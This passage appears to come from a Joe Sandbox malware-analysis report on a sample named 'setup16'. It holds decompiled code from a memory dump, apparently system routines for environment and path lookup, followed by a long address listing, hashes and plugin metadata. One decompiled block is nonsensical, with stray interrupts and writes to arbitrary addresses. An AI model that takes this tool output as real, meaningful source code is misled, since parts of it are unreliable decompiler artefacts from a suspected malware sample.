										__eax = E049DEB70(__ecx, 0x4ab79a0);
										__eax = _v52;
										L36:
										_pop(_t323);
										_pop(_t331);
										__eflags = _v8 ^ _t334;
										_pop(_t282);
										return E04A0B640(_t212, _t282, _v8 ^ _t334, _t311, _t323, _t331);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t277 = _v56;
								if(_v56 != 0) {
									_t311 =  &_v36;
									_t279 = E049F2E3E(_t277,  &_v36);
									_t291 = _v36;
									_v76 = _t279;
								}
								if(_t291 == 0) {
									goto L44;
								} else {
									_t281 = _t281 + 2 + _t291;
								}
								goto L14;
							case 6:
								__eax =  *0x4ab5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x4ab8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4ab8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x4ab6e58 & 0x0000ffff;
								__eax = ( *0x4ab6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t322 = _t322 + 1;
								if(_t322 >= _v48) {
									goto L16;
								} else {
									_t311 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("lahf");
					 *((intOrPtr*)(_t324 - 0x60d81ffc)) =  *((intOrPtr*)(_t324 - 0x60d81ffc)) - _t281;
					asm("lahf");
					 *((intOrPtr*)(_t324 - 0x60d9fafc)) =  *((intOrPtr*)(_t324 - 0x60d9fafc)) - _t281;
					_t241 = _t237 + 0xf9;
					 *0x9f289404 = _t241;
					_t242 = _t241 + 0x35;
					_t286 = 0x25;
					 *0x9f290204 = _t242;
					 *((intOrPtr*)(_t324 - 0x60d809fc)) =  *((intOrPtr*)(_t324 - 0x60d809fc)) - _t286;
					 *((intOrPtr*)(_t324 - 0x60d7b1fc)) =  *((intOrPtr*)(_t324 - 0x60d7b1fc)) - _t286;
					asm("daa");
					asm("lahf");
					_t246 = _t242 + 0x1d3;
					_pop(_t287);
					 *0x9f28b404 = _t246;
					_pop(_t339);
					 *0xcccccc04 = _t246 + 0x34;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x4a9ff00);
					E04A1D08C(_t287, _t324, _t329);
					_v44 =  *[fs:0x18];
					_t325 = 0;
					 *_a24 = 0;
					_t288 = _a12;
					__eflags = _t288;
					if(_t288 == 0) {
						_t250 = 0xc0000100;
					} else {
						_v8 = 0;
						_t332 = 0xc0000100;
						_v52 = 0xc0000100;
						_t252 = 4;
						while(1) {
							_v40 = _t252;
							__eflags = _t252;
							if(_t252 == 0) {
								break;
							}
							_t301 = _t252 * 0xc;
							_v48 = _t301;
							__eflags = _t288 -  *((intOrPtr*)(_t301 + 0x49a1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t267 = E04A0E5C0(_a8,  *((intOrPtr*)(_t301 + 0x49a1668)), _t288);
									_t339 = _t339 + 0xc;
									__eflags = _t267;
									if(__eflags == 0) {
										_t332 = E04A451BE(_t288,  *((intOrPtr*)(_v48 + 0x49a166c)), _a16, _t325, _t332, __eflags, _a20, _a24);
										_v52 = _t332;
										break;
									} else {
										_t252 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t252 = _t252 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t332;
						__eflags = _t332;
						if(_t332 < 0) {
							__eflags = _t332 - 0xc0000100;
							if(_t332 == 0xc0000100) {
								_t297 = _a4;
								__eflags = _t297;
								if(_t297 != 0) {
									_v36 = _t297;
									__eflags =  *_t297 - _t325;
									if( *_t297 == _t325) {
										_t332 = 0xc0000100;
										goto L76;
									} else {
										_t313 =  *((intOrPtr*)(_v44 + 0x30));
										_t254 =  *((intOrPtr*)(_t313 + 0x10));
										__eflags =  *((intOrPtr*)(_t254 + 0x48)) - _t297;
										if( *((intOrPtr*)(_t254 + 0x48)) == _t297) {
											__eflags =  *(_t313 + 0x1c);
											if( *(_t313 + 0x1c) == 0) {
												L106:
												_t332 = E049F2AE4( &_v36, _a8, _t288, _a16, _a20, _a24);
												_v32 = _t332;
												__eflags = _t332 - 0xc0000100;
												if(_t332 != 0xc0000100) {
													goto L69;
												} else {
													_t325 = 1;
													_t297 = _v36;
													goto L75;
												}
											} else {
												_t257 = E049D6600( *(_t313 + 0x1c));
												__eflags = _t257;
												if(_t257 != 0) {
													goto L106;
												} else {
													_t297 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t332 = E049F2C50(_t297, _a8, _t288, _a16, _a20, _a24, _t325);
											L76:
											_v32 = _t332;
											goto L69;
										}
									}
									goto L108;
								} else {
									E049DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t332 = _a24;
									_t264 = E049F2AE4( &_v36, _a8, _t288, _a16, _a20, _t332);
									_v32 = _t264;
									__eflags = _t264 - 0xc0000100;
									if(_t264 == 0xc0000100) {
										_v32 = E049F2C50(_v36, _a8, _t288, _a16, _a20, _t332, 1);
									}
									_v8 = _t325;
									E049F2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t250 = _t332;
					}
					L70:
					return E04A1D0D1(_t250);
				}
				L108:
			}






















































                                                                                                                                                                                                        0x049f2584
                                                                                                                                                                                                        0x049f2586
                                                                                                                                                                                                        0x049f2590
                                                                                                                                                                                                        0x049f2596
                                                                                                                                                                                                        0x049f2597
                                                                                                                                                                                                        0x049f2598
                                                                                                                                                                                                        0x049f2599
                                                                                                                                                                                                        0x049f259e
                                                                                                                                                                                                        0x049f25a4
                                                                                                                                                                                                        0x049f25a9
                                                                                                                                                                                                        0x049f25ac
                                                                                                                                                                                                        0x049f25ae
                                                                                                                                                                                                        0x049f25b1
                                                                                                                                                                                                        0x049f25b2
                                                                                                                                                                                                        0x049f25b5
                                                                                                                                                                                                        0x049f25b8
                                                                                                                                                                                                        0x049f25bb
                                                                                                                                                                                                        0x049f25bc
                                                                                                                                                                                                        0x049f25bf
                                                                                                                                                                                                        0x049f25c2
                                                                                                                                                                                                        0x049f25c5
                                                                                                                                                                                                        0x049f25c6
                                                                                                                                                                                                        0x049f25cb
                                                                                                                                                                                                        0x049f25ce
                                                                                                                                                                                                        0x049f25d8
                                                                                                                                                                                                        0x049f25db
                                                                                                                                                                                                        0x049f25dd
                                                                                                                                                                                                        0x049f25de
                                                                                                                                                                                                        0x049f25e1
                                                                                                                                                                                                        0x049f25e3
                                                                                                                                                                                                        0x049f25e9
                                                                                                                                                                                                        0x049f26da
                                                                                                                                                                                                        0x049f26da
                                                                                                                                                                                                        0x049f26dd
                                                                                                                                                                                                        0x049f26e2
                                                                                                                                                                                                        0x04a35b56
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f26e8
                                                                                                                                                                                                        0x049f26f9
                                                                                                                                                                                                        0x049f26fb
                                                                                                                                                                                                        0x049f26fe
                                                                                                                                                                                                        0x049f2700
                                                                                                                                                                                                        0x04a35b60
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2706
                                                                                                                                                                                                        0x049f2706
                                                                                                                                                                                                        0x049f270a
                                                                                                                                                                                                        0x049f270a
                                                                                                                                                                                                        0x049f270d
                                                                                                                                                                                                        0x049f2713
                                                                                                                                                                                                        0x049f2716
                                                                                                                                                                                                        0x049f2718
                                                                                                                                                                                                        0x049f271c
                                                                                                                                                                                                        0x049f271e
                                                                                                                                                                                                        0x04a35b6c
                                                                                                                                                                                                        0x04a35b6f
                                                                                                                                                                                                        0x04a35b7f
                                                                                                                                                                                                        0x04a35b89
                                                                                                                                                                                                        0x04a35b8e
                                                                                                                                                                                                        0x04a35b93
                                                                                                                                                                                                        0x04a35b96
                                                                                                                                                                                                        0x04a35b9c
                                                                                                                                                                                                        0x04a35ba0
                                                                                                                                                                                                        0x04a35ba3
                                                                                                                                                                                                        0x04a35bab
                                                                                                                                                                                                        0x04a35bb0
                                                                                                                                                                                                        0x04a35bb3
                                                                                                                                                                                                        0x04a35bb3
                                                                                                                                                                                                        0x04a35ba3
                                                                                                                                                                                                        0x049f2724
                                                                                                                                                                                                        0x049f2726
                                                                                                                                                                                                        0x049f2729
                                                                                                                                                                                                        0x049f272c
                                                                                                                                                                                                        0x049f279d
                                                                                                                                                                                                        0x049f279d
                                                                                                                                                                                                        0x049f27a0
                                                                                                                                                                                                        0x049f27a2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f272e
                                                                                                                                                                                                        0x049f272e
                                                                                                                                                                                                        0x049f2731
                                                                                                                                                                                                        0x049f2734
                                                                                                                                                                                                        0x049f2734
                                                                                                                                                                                                        0x049f2736
                                                                                                                                                                                                        0x04a35bc1
                                                                                                                                                                                                        0x04a35bc1
                                                                                                                                                                                                        0x04a35bc4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35bca
                                                                                                                                                                                                        0x04a35bca
                                                                                                                                                                                                        0x04a35bcd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35bd3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35bd3
                                                                                                                                                                                                        0x04a35bcd
                                                                                                                                                                                                        0x049f273c
                                                                                                                                                                                                        0x049f273c
                                                                                                                                                                                                        0x049f2742
                                                                                                                                                                                                        0x049f2747
                                                                                                                                                                                                        0x049f274a
                                                                                                                                                                                                        0x049f274d
                                                                                                                                                                                                        0x049f2750
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2756
                                                                                                                                                                                                        0x049f2756
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2902
                                                                                                                                                                                                        0x049f2908
                                                                                                                                                                                                        0x049f290b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2911
                                                                                                                                                                                                        0x049f291c
                                                                                                                                                                                                        0x049f2921
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2921
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2880
                                                                                                                                                                                                        0x049f2887
                                                                                                                                                                                                        0x049f288c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2805
                                                                                                                                                                                                        0x049f280a
                                                                                                                                                                                                        0x049f2814
                                                                                                                                                                                                        0x049f2816
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f281e
                                                                                                                                                                                                        0x049f2821
                                                                                                                                                                                                        0x049f2823
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2829
                                                                                                                                                                                                        0x049f2829
                                                                                                                                                                                                        0x049f2831
                                                                                                                                                                                                        0x049f283c
                                                                                                                                                                                                        0x049f283e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f283e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f284e
                                                                                                                                                                                                        0x049f2850
                                                                                                                                                                                                        0x049f2851
                                                                                                                                                                                                        0x049f2854
                                                                                                                                                                                                        0x049f2857
                                                                                                                                                                                                        0x049f285a
                                                                                                                                                                                                        0x049f285c
                                                                                                                                                                                                        0x049f285d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f275d
                                                                                                                                                                                                        0x049f2761
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2767
                                                                                                                                                                                                        0x049f276e
                                                                                                                                                                                                        0x049f2773
                                                                                                                                                                                                        0x049f2773
                                                                                                                                                                                                        0x049f2776
                                                                                                                                                                                                        0x049f2778
                                                                                                                                                                                                        0x049f277e
                                                                                                                                                                                                        0x049f277e
                                                                                                                                                                                                        0x049f2781
                                                                                                                                                                                                        0x049f2781
                                                                                                                                                                                                        0x049f2783
                                                                                                                                                                                                        0x049f2784
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35bd8
                                                                                                                                                                                                        0x04a35bde
                                                                                                                                                                                                        0x04a35be4
                                                                                                                                                                                                        0x04a35be6
                                                                                                                                                                                                        0x04a35be8
                                                                                                                                                                                                        0x04a35be9
                                                                                                                                                                                                        0x04a35bee
                                                                                                                                                                                                        0x04a35bf8
                                                                                                                                                                                                        0x04a35bff
                                                                                                                                                                                                        0x04a35c01
                                                                                                                                                                                                        0x04a35c04
                                                                                                                                                                                                        0x04a35c07
                                                                                                                                                                                                        0x04a35c0b
                                                                                                                                                                                                        0x04a35c0d
                                                                                                                                                                                                        0x04a35c0d
                                                                                                                                                                                                        0x04a35c15
                                                                                                                                                                                                        0x04a35c18
                                                                                                                                                                                                        0x04a35c1b
                                                                                                                                                                                                        0x04a35c1b
                                                                                                                                                                                                        0x04a35c1e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f28c3
                                                                                                                                                                                                        0x049f28c8
                                                                                                                                                                                                        0x049f28d2
                                                                                                                                                                                                        0x049f28d4
                                                                                                                                                                                                        0x049f28d8
                                                                                                                                                                                                        0x049f28db
                                                                                                                                                                                                        0x04a35c26
                                                                                                                                                                                                        0x04a35c28
                                                                                                                                                                                                        0x04a35c2d
                                                                                                                                                                                                        0x04a35c2d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35c34
                                                                                                                                                                                                        0x04a35c36
                                                                                                                                                                                                        0x04a35c49
                                                                                                                                                                                                        0x04a35c4e
                                                                                                                                                                                                        0x04a35c54
                                                                                                                                                                                                        0x04a35c5b
                                                                                                                                                                                                        0x04a35c5d
                                                                                                                                                                                                        0x04a35c60
                                                                                                                                                                                                        0x049f2788
                                                                                                                                                                                                        0x049f2788
                                                                                                                                                                                                        0x049f278b
                                                                                                                                                                                                        0x049f278e
                                                                                                                                                                                                        0x049f278e
                                                                                                                                                                                                        0x049f278e
                                                                                                                                                                                                        0x049f2791
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2756
                                                                                                                                                                                                        0x049f2750
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2794
                                                                                                                                                                                                        0x049f2794
                                                                                                                                                                                                        0x049f2795
                                                                                                                                                                                                        0x049f2798
                                                                                                                                                                                                        0x049f2798
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2734
                                                                                                                                                                                                        0x049f272c
                                                                                                                                                                                                        0x049f2700
                                                                                                                                                                                                        0x049f25ef
                                                                                                                                                                                                        0x049f25ef
                                                                                                                                                                                                        0x049f25ef
                                                                                                                                                                                                        0x049f25f2
                                                                                                                                                                                                        0x049f25f8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f25fe
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f28e6
                                                                                                                                                                                                        0x049f28ec
                                                                                                                                                                                                        0x049f28ef
                                                                                                                                                                                                        0x049f28f5
                                                                                                                                                                                                        0x049f28f8
                                                                                                                                                                                                        0x049f28f8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f28f8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2866
                                                                                                                                                                                                        0x049f2866
                                                                                                                                                                                                        0x049f2876
                                                                                                                                                                                                        0x049f2879
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f27e0
                                                                                                                                                                                                        0x049f27e7
                                                                                                                                                                                                        0x049f27e9
                                                                                                                                                                                                        0x049f27eb
                                                                                                                                                                                                        0x04a35afd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35afd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2633
                                                                                                                                                                                                        0x049f2638
                                                                                                                                                                                                        0x049f263b
                                                                                                                                                                                                        0x049f263c
                                                                                                                                                                                                        0x049f263e
                                                                                                                                                                                                        0x049f2640
                                                                                                                                                                                                        0x049f2642
                                                                                                                                                                                                        0x049f2647
                                                                                                                                                                                                        0x049f2649
                                                                                                                                                                                                        0x049f264e
                                                                                                                                                                                                        0x049f2650
                                                                                                                                                                                                        0x049f2653
                                                                                                                                                                                                        0x049f2659
                                                                                                                                                                                                        0x049f26a2
                                                                                                                                                                                                        0x049f26a7
                                                                                                                                                                                                        0x049f26ac
                                                                                                                                                                                                        0x049f26b2
                                                                                                                                                                                                        0x04a35b11
                                                                                                                                                                                                        0x04a35b15
                                                                                                                                                                                                        0x04a35b17
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f26b8
                                                                                                                                                                                                        0x049f26b8
                                                                                                                                                                                                        0x049f26ba
                                                                                                                                                                                                        0x049f27a6
                                                                                                                                                                                                        0x049f27a6
                                                                                                                                                                                                        0x049f27a9
                                                                                                                                                                                                        0x049f27ab
                                                                                                                                                                                                        0x049f27b9
                                                                                                                                                                                                        0x049f27b9
                                                                                                                                                                                                        0x049f27be
                                                                                                                                                                                                        0x049f27c1
                                                                                                                                                                                                        0x049f27c3
                                                                                                                                                                                                        0x049f27c5
                                                                                                                                                                                                        0x049f27c7
                                                                                                                                                                                                        0x04a35c74
                                                                                                                                                                                                        0x04a35c79
                                                                                                                                                                                                        0x04a35c79
                                                                                                                                                                                                        0x049f27c7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f26c0
                                                                                                                                                                                                        0x049f26c0
                                                                                                                                                                                                        0x049f26c3
                                                                                                                                                                                                        0x049f26c6
                                                                                                                                                                                                        0x049f26c6
                                                                                                                                                                                                        0x049f26c9
                                                                                                                                                                                                        0x049f26c9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f26c9
                                                                                                                                                                                                        0x049f26ba
                                                                                                                                                                                                        0x049f265b
                                                                                                                                                                                                        0x049f265b
                                                                                                                                                                                                        0x049f265e
                                                                                                                                                                                                        0x049f2667
                                                                                                                                                                                                        0x049f266d
                                                                                                                                                                                                        0x049f2677
                                                                                                                                                                                                        0x049f267c
                                                                                                                                                                                                        0x049f267f
                                                                                                                                                                                                        0x049f2681
                                                                                                                                                                                                        0x04a35b49
                                                                                                                                                                                                        0x04a35b4e
                                                                                                                                                                                                        0x049f27cd
                                                                                                                                                                                                        0x049f27d0
                                                                                                                                                                                                        0x049f27d1
                                                                                                                                                                                                        0x049f27d2
                                                                                                                                                                                                        0x049f27d4
                                                                                                                                                                                                        0x049f27dd
                                                                                                                                                                                                        0x049f2687
                                                                                                                                                                                                        0x049f2687
                                                                                                                                                                                                        0x049f268a
                                                                                                                                                                                                        0x049f268b
                                                                                                                                                                                                        0x049f268e
                                                                                                                                                                                                        0x049f268f
                                                                                                                                                                                                        0x049f2691
                                                                                                                                                                                                        0x049f2696
                                                                                                                                                                                                        0x049f2698
                                                                                                                                                                                                        0x049f269d
                                                                                                                                                                                                        0x049f269f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f269f
                                                                                                                                                                                                        0x049f2681
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2846
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2605
                                                                                                                                                                                                        0x049f260a
                                                                                                                                                                                                        0x049f260c
                                                                                                                                                                                                        0x049f2611
                                                                                                                                                                                                        0x049f2616
                                                                                                                                                                                                        0x049f2619
                                                                                                                                                                                                        0x049f2619
                                                                                                                                                                                                        0x049f261e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2624
                                                                                                                                                                                                        0x049f2627
                                                                                                                                                                                                        0x049f2627
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35b1f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2894
                                                                                                                                                                                                        0x049f289b
                                                                                                                                                                                                        0x049f289d
                                                                                                                                                                                                        0x049f28a1
                                                                                                                                                                                                        0x04a35b2b
                                                                                                                                                                                                        0x04a35b2e
                                                                                                                                                                                                        0x04a35b2e
                                                                                                                                                                                                        0x049f28a7
                                                                                                                                                                                                        0x049f28a9
                                                                                                                                                                                                        0x04a35b04
                                                                                                                                                                                                        0x04a35b09
                                                                                                                                                                                                        0x04a35b09
                                                                                                                                                                                                        0x04a35b09
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35b35
                                                                                                                                                                                                        0x04a35b3c
                                                                                                                                                                                                        0x049f28fb
                                                                                                                                                                                                        0x049f28fb
                                                                                                                                                                                                        0x049f26cc
                                                                                                                                                                                                        0x049f26cc
                                                                                                                                                                                                        0x049f26d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f26d2
                                                                                                                                                                                                        0x049f26d2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f26d2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f25fe
                                                                                                                                                                                                        0x049f292d
                                                                                                                                                                                                        0x049f2930
                                                                                                                                                                                                        0x049f2935
                                                                                                                                                                                                        0x049f2937
                                                                                                                                                                                                        0x049f293a
                                                                                                                                                                                                        0x049f2942
                                                                                                                                                                                                        0x049f2946
                                                                                                                                                                                                        0x049f294c
                                                                                                                                                                                                        0x049f294f
                                                                                                                                                                                                        0x049f2954
                                                                                                                                                                                                        0x049f2956
                                                                                                                                                                                                        0x049f2957
                                                                                                                                                                                                        0x049f295e
                                                                                                                                                                                                        0x049f2966
                                                                                                                                                                                                        0x049f296e
                                                                                                                                                                                                        0x049f296f
                                                                                                                                                                                                        0x049f2970
                                                                                                                                                                                                        0x049f2972
                                                                                                                                                                                                        0x049f2973
                                                                                                                                                                                                        0x049f297a
                                                                                                                                                                                                        0x049f297b
                                                                                                                                                                                                        0x049f2980
                                                                                                                                                                                                        0x049f2981
                                                                                                                                                                                                        0x049f2982
                                                                                                                                                                                                        0x049f2983
                                                                                                                                                                                                        0x049f2984
                                                                                                                                                                                                        0x049f2985
                                                                                                                                                                                                        0x049f2986
                                                                                                                                                                                                        0x049f2987
                                                                                                                                                                                                        0x049f2988
                                                                                                                                                                                                        0x049f2989
                                                                                                                                                                                                        0x049f298a
                                                                                                                                                                                                        0x049f298b
                                                                                                                                                                                                        0x049f298c
                                                                                                                                                                                                        0x049f298d
                                                                                                                                                                                                        0x049f298e
                                                                                                                                                                                                        0x049f298f
                                                                                                                                                                                                        0x049f2990
                                                                                                                                                                                                        0x049f2992
                                                                                                                                                                                                        0x049f2997
                                                                                                                                                                                                        0x049f29a3
                                                                                                                                                                                                        0x049f29a6
                                                                                                                                                                                                        0x049f29ab
                                                                                                                                                                                                        0x049f29ad
                                                                                                                                                                                                        0x049f29b0
                                                                                                                                                                                                        0x049f29b2
                                                                                                                                                                                                        0x04a35c80
                                                                                                                                                                                                        0x049f29b8
                                                                                                                                                                                                        0x049f29b8
                                                                                                                                                                                                        0x049f29bb
                                                                                                                                                                                                        0x049f29c0
                                                                                                                                                                                                        0x049f29c5
                                                                                                                                                                                                        0x049f29c6
                                                                                                                                                                                                        0x049f29c6
                                                                                                                                                                                                        0x049f29c9
                                                                                                                                                                                                        0x049f29cb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f29cd
                                                                                                                                                                                                        0x049f29d0
                                                                                                                                                                                                        0x049f29d9
                                                                                                                                                                                                        0x049f29db
                                                                                                                                                                                                        0x049f29dd
                                                                                                                                                                                                        0x049f2a7f
                                                                                                                                                                                                        0x049f2a84
                                                                                                                                                                                                        0x049f2a87
                                                                                                                                                                                                        0x049f2a89
                                                                                                                                                                                                        0x04a35ca1
                                                                                                                                                                                                        0x04a35ca3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2a8f
                                                                                                                                                                                                        0x049f2a8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2a8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f29e3
                                                                                                                                                                                                        0x049f29e3
                                                                                                                                                                                                        0x049f29e3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f29e3
                                                                                                                                                                                                        0x049f29dd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f29db
                                                                                                                                                                                                        0x049f29e6
                                                                                                                                                                                                        0x049f29e9
                                                                                                                                                                                                        0x049f29eb
                                                                                                                                                                                                        0x049f29ed
                                                                                                                                                                                                        0x049f29f3
                                                                                                                                                                                                        0x049f29f5
                                                                                                                                                                                                        0x049f29f8
                                                                                                                                                                                                        0x049f29fa
                                                                                                                                                                                                        0x049f2a97
                                                                                                                                                                                                        0x049f2a9a
                                                                                                                                                                                                        0x049f2a9d
                                                                                                                                                                                                        0x049f2add
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2a9f
                                                                                                                                                                                                        0x049f2aa2
                                                                                                                                                                                                        0x049f2aa5
                                                                                                                                                                                                        0x049f2aa8
                                                                                                                                                                                                        0x049f2aab
                                                                                                                                                                                                        0x04a35cab
                                                                                                                                                                                                        0x04a35caf
                                                                                                                                                                                                        0x04a35cc5
                                                                                                                                                                                                        0x04a35cda
                                                                                                                                                                                                        0x04a35cdc
                                                                                                                                                                                                        0x04a35cdf
                                                                                                                                                                                                        0x04a35ce5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35ceb
                                                                                                                                                                                                        0x04a35ced
                                                                                                                                                                                                        0x04a35cee
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35cee
                                                                                                                                                                                                        0x04a35cb1
                                                                                                                                                                                                        0x04a35cb4
                                                                                                                                                                                                        0x04a35cb9
                                                                                                                                                                                                        0x04a35cbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35cbd
                                                                                                                                                                                                        0x04a35cbd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35cbd
                                                                                                                                                                                                        0x04a35cbb
                                                                                                                                                                                                        0x049f2ab1
                                                                                                                                                                                                        0x049f2ab1
                                                                                                                                                                                                        0x049f2ac4
                                                                                                                                                                                                        0x049f2ac6
                                                                                                                                                                                                        0x049f2ac6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2ac6
                                                                                                                                                                                                        0x049f2aab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2a00
                                                                                                                                                                                                        0x049f2a09
                                                                                                                                                                                                        0x049f2a0e
                                                                                                                                                                                                        0x049f2a21
                                                                                                                                                                                                        0x049f2a24
                                                                                                                                                                                                        0x049f2a35
                                                                                                                                                                                                        0x049f2a3a
                                                                                                                                                                                                        0x049f2a3d
                                                                                                                                                                                                        0x049f2a42
                                                                                                                                                                                                        0x049f2a59
                                                                                                                                                                                                        0x049f2a59
                                                                                                                                                                                                        0x049f2a5c
                                                                                                                                                                                                        0x049f2a5f
                                                                                                                                                                                                        0x049f2a5f
                                                                                                                                                                                                        0x049f29fa
                                                                                                                                                                                                        0x049f29f3
                                                                                                                                                                                                        0x049f2a64
                                                                                                                                                                                                        0x049f2a64
                                                                                                                                                                                                        0x049f2a6b
                                                                                                                                                                                                        0x049f2a6b
                                                                                                                                                                                                        0x049f2a6d
                                                                                                                                                                                                        0x049f2a72
                                                                                                                                                                                                        0x049f2a72
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: PATH
                                                                                                                                                                                                        • API String ID: 0-1036084923
                                                                                                                                                                                                        • Opcode ID: ce4739a62b5408a933a10bcc1f69d9b159254797607a8e4ba9b24f9871deb841
                                                                                                                                                                                                        • Instruction ID: 00582c3ee31b018a9856a5419e8c4bcda6eff8bfbe7af74cc322dd4f1cb737fe
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce4739a62b5408a933a10bcc1f69d9b159254797607a8e4ba9b24f9871deb841
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47C1AD71E00609EBDB24DF99DC80BAEB7B5FF88714F144469E901AB290E775B941CBA0
                                                                                                                                                                                                        Uniqueness

